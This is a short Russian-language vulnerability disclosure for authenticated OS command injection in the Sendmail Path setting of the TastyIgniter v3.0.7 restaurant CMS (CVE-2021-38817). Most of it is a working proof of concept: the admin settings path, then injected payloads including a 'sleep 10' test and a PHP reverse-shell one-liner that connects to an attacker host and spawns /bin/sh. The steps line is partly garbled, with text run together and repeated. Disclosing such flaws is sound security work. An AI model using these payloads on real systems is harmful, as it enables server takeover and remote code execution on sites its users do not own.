
Удаленное внедрение команд ОС в TastyIgniter v3.0.7 в поле Sendmail Path
Аутентифицированная удалённая инъекция команд ОС / удалённое выполнение кода в веб-части Sendmail TastyIgniter v3.0.7 (CVE-2021-38817)
Уязвимость аутентифицированной удалённой инъекции команд ОС существует в меню конфигурации Sendmail веб-приложения TastyIgniter v3.0.7 (CMS для ресторанов). Параметр Sendmail Path не обрабатывается должным образом, о чём свидетельствует команда /usr/sbin/sendmail -bs, подставляемая в поле; это позволяет внедрить произвольную команду, добавив точку с запятой и дополнительную команду ОС.
/admin/settings/edit/mail/admin/settings/edit/mailMail Protocol выберите SendmailSendMail Path добавьте точку с запятой и произвольную команду ОС, например: /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Мэтт Кили (HuskyHacks) и Майк Падрик (Fearless), август 2021 г.
CVE присвоен в октябре 2022 г. (лол)